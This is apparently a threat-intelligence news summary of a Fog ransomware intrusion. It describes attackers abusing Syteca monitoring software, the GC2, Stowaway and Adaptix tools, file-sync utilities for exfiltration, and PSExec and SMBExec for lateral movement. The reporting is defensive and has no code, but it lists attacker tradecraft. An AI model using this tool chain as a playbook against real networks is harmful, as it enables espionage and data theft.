Fog ransomware represents a growing cyber threat where attackers misuse legitimate IT tools for malicious purposes. In this case, the attackers employed Syteca (formerly Ekran), an employee monitoring software, to secretly record screens and keystrokes, indicating an intent beyond financial gain, potentially espionage. This tool, typically used by companies for internal monitoring, became a means for the attackers to spy on employees and gather sensitive information.

According to the Researcher, the attackers also leveraged open-source penetration testing tools like GC2, Stowaway, and Adaptix. These are usually used by security professionals but were repurposed to establish covert communication channels, move files, and maintain access. GC2 communicated via platforms like Google Sheets, while Stowaway was used to install Syteca silently. Standard reconnaissance commands like whoami and ipconfig were executed, resembling tactics used by advanced persistent threat (APT) groups.

In a notable deviation from typical ransomware behavior, the attackers created persistent backdoors even after encrypting data. They used tools like FreeFileSync, MegaSync, and 7-Zip to exfiltrate files, and PSExec and SMBExec for lateral movement. A watchdog process ensured their tools kept running undetected. This suggests that ransomware may have been a smokescreen, while the true objective was long-term espionage and data theft.